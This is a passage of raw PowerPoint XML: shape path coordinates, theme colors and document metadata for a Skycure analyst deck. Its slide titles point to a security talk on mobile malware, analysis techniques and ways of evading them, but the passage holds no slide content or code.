                <a:lnTo>
                  <a:pt x="1242" y="818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1242" y="818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1178" y="857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1178" y="857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1120" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1056" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1056" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1030" y="922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004" y="928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="972" y="922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="947" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="947" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="882" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="882" y="889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="824" y="857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="824" y="857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760" y="818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760" y="818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715" y="786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715" y="786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418" y="593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418" y="593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1822" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1822" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1860" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1892" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1951" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1951" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1970" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1996" y="129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2002" y="161"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2002" y="471"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2002" y="1290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2002" y="1290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1996" y="1322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989" y="1355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1970" y="1380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1951" y="1406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1951" y="1406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="1432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1892" y="1444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1860" y="1451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1822" y="1457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="1457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="1457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142" y="1451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110" y="1444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="1432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="1406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="1406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="1380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451" y="773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="669" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="669" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="772" y="986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="772" y="986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="818" y="1006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="876" y="1031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="876" y="1031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="940" y="1051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="1057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998" y="1057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004" y="1057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1004" y="1057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1062" y="1051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1127" y="1031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1127" y="1031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1185" y="1006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1230" y="986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1230" y="986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1333" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1333" y="915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1564" y="760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1887" y="561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1887" y="561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1951" y="516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2002" y="47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645" y="3743534"/>
            <a:ext cx="480201" cy="480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885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Skycure Jan 2015">
  <a:themeElements>
    <a:clrScheme name="Custom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086C1"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FD8608"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="558B02"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="E70005"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="1EB9FF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="FC4E07"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="1086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Skycure Jan 2015 v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dirty="0" smtClean="0">
            <a:latin typeface="Lato Light"/>
            <a:cs typeface="Lato Light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incapsula_ppt.thmx</Template>
  <TotalTime>26546</TotalTime>
  <Words>639</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>179</Paragraphs>
  <Slides>28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49" baseType="lpstr">
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Adobe Arabic</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Georgia</vt:lpstr>
      <vt:lpstr>Helvetica Neue Condensed</vt:lpstr>
      <vt:lpstr>Lato Bold</vt:lpstr>
      <vt:lpstr>Lato Light</vt:lpstr>
      <vt:lpstr>Lato Regular</vt:lpstr>
      <vt:lpstr>Lucida Grande</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Menlo-Bold</vt:lpstr>
      <vt:lpstr>Menlo-Regular</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Ubuntu</vt:lpstr>
      <vt:lpstr>1_Skycure Jan 2015</vt:lpstr>
      <vt:lpstr>Skycure Jan 2015 v2</vt:lpstr>
      <vt:lpstr>Why Are Hackers Winning the Mobile Malware Battle</vt:lpstr>
      <vt:lpstr>Introductions</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Modern Mobile Attacks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>       </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Mobile Malware</vt:lpstr>
      <vt:lpstr>Evolution of Android Malware</vt:lpstr>
      <vt:lpstr>Malware Analysis Techniques</vt:lpstr>
      <vt:lpstr>Signature-Based Analysis</vt:lpstr>
      <vt:lpstr>Dynamic Analysis</vt:lpstr>
      <vt:lpstr>Bypassing Dynamic Analysis</vt:lpstr>
      <vt:lpstr>Static Analysis</vt:lpstr>
      <vt:lpstr>Static Analysis (in detail)</vt:lpstr>
      <vt:lpstr>Static Analysis (taint analysis example)</vt:lpstr>
      <vt:lpstr>Bypassing Static Analysis</vt:lpstr>
      <vt:lpstr>Bypassing Static Analysis</vt:lpstr>
      <vt:lpstr>Bypassing Advanced Techniques</vt:lpstr>
      <vt:lpstr>Let’s Make It Concrete</vt:lpstr>
      <vt:lpstr>App Repackaging - The Steps</vt:lpstr>
      <vt:lpstr>Live Demo</vt:lpstr>
      <vt:lpstr>Stealthy Malware – Next Steps</vt:lpstr>
      <vt:lpstr>So What Can Defenders Do?</vt:lpstr>
      <vt:lpstr>Apply What You Have Learned</vt:lpstr>
      <vt:lpstr>Q&amp;A And Next Steps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Skycure Analyst Deck</dc:title>
  <dc:subject/>
  <dc:creator/>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>AviD</cp:lastModifiedBy>
  <cp:revision>719</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-16T12:31:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-11-18T01:25:21Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>